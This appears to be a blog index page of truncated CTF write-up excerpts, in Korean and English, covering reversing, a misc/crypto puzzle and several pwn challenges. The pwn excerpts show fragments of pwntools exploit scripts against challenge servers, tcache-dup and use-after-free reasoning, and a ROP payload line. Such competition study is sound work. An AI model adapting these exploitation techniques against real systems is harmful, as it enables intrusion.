CTF Write-Up

    [ASCTF 2021] 출제자 Write-up [Rev(1), MISC&Crypto(3), Pwn(5)]
    CTF Write-Up

    [ASCTF 2021] 출제자 Write-up [Rev(1), MISC&Crypto(3), Pwn(5)]

    🧡 Rev - One Time Pad 사실 KUCIS Project 할 때 내가 만든 프로그램으로 원래는 소켓 통신 전용 프로그램이다. OTP를 실용적으로 이용하기 위한 방안을 연구하던 도중 나온 커스텀 알고리즘이다. 다음 내용을 이용하여 복호화를 수행할 수 있다. 🎃 Flag: ASCTF{C#_is_shy} 🧡 MISC - 찌릿찌릿 flag.txt 파일을 열면 base64로 인코딩된 텍스트가 나온다. 디코딩 하면? 해당 내용을 caesar cipher key=6으로 decrypt 해주면 다음 내용이 나온다. 문제에서도 피카츄라는 사진으로 힌트를 줬다. Picalang이라는 Brainfuck 언어이다. URL: https://www.dcode.fr/pikalang-language Pikalang Prog..

    CTF Write-Up

    [SSTF 2021] Hackers Playground Writeup

    🧡 LostArk Simple UAF problem 😉 from pwn import * context.log_level = 'debug' #p = process('./lostark') p = remote('lostark.sstf.site', 1337) def create(idx, name): p.sendlineafter(':', '1') p.sendlineafter(':', str(idx)) if idx == 7: return else: p.sendlineafter(':', name) def delete(idx): p.sendlineafter(':', '2') p.sendlineafter(':', str(idx)) def choose(idx): p.sendlineafter(':', '4') p.sendl..

    [RaRCTF 2021] Only Pwn Writeup
    CTF Write-Up

    [RaRCTF 2021] Only Pwn Writeup

    이틀이나 늦게 시작해서 문제를 많이 보진 못했다. >︿< (Plz turn on the black mode) I started two days late, so I didn't solve many problems. 🧡 Archer (100 points) undefined8 main(void) { char *pcVar1; char local_d [5]; puts("It\'s battle day archer! Have you got what it takes?"); printf("Answer [yes/no]: "); fflush(stdout); fgets(local_d,5,stdin); pcVar1 = strstr(local_d,"no"); if (pcVar1 != (char *)0x0) { puts("Batt..

    CTF Write-Up

    [UDCTF 2021 | BlueHens 2021] Partial Writeup

    Encrheapt just malloc and free tcache dup. it's freaking easy. just do it from pwn import * #context.log_level = 'debug' #p = process("./a.out") p = remote("challenges.ctfd.io", 30028) def encrypt(ch, size, con): p.sendlineafter('3. Exit\n', '1') p.sendlineafter('2)??: ', str(ch)) p.sendlineafter(' key?:', '1') p.sendlineafter('How much would you like to encrypt: ', str(size)) p.sendlineafter('W..

    [UTCTF 2021] Partial Writeup
    CTF Write-Up

    [UTCTF 2021] Partial Writeup

    Monke so we should set can_eat to 0 to use tcache dup. when we type a char except 'w', 'e', 's', 'n', we can set can_eat to 0. and we can leak to free unsorted bin and read the name of banana (which has been freed). so I know libc_addr and we can AAW by tcache dup let's play~ from pwn import * p = remote("pwn.utctf.live", 9999) elf = ELF("./monke") libc = ELF("./libc-2.27.so") def walk(d): p.sen..

    [zer0pts CTF 2021] Partial Writeup
    CTF Write-Up

    [zer0pts CTF 2021] Partial Writeup

    Infected The goal of this problem is to access /root directory. Upon extraction, the backdoor file and the pow.py file are located. First, let's analyze pow.py. """ i.e. sha256("????v0iRhxH4SlrgoUd5Blu0") = b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c Suffix: v0iRhxH4SlrgoUd5Blu0 Hash: b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c """ import itertools impor..

    [TrollCat CTF] Only Pwnable WriteUp
    CTF Write-Up

    [TrollCat CTF] Only Pwnable WriteUp

    Thoughts Only using bad func, we can't attack BOF vulnerability. (Length of bad_thought is 0x20 and dest variable exists at [ebp - 0x28]) but look at this, using good_thougt, we can concatenate the two strings, good and bad thought. then 'strcpy' func in bad func copy the BIG STRING(bad + good thought) to dest variable. look at the exploit code. from pwn import * p = remote("157.230.33.195", 111..

    [0x41414141 CTF] Only Pwnable Writeup
    CTF Write-Up

    [0x41414141 CTF] Only Pwnable Writeup

    moving-signals There's only __start function. It consists of simple assemblies. Given that there are no NX bit, it seems to e a problem using shellcode(asm). In addition, /bin/sh is at 0x41250. I will use the following payload to leak the stack address. (ROP, RTL chain) payload = 'A'*8 + p64(0x41018) + p64(0x1) + p64(0x41000) + p64(0x41018) + p64(0x0) + p64(0x41000) It is a payload that sets rax..

티스토리툴바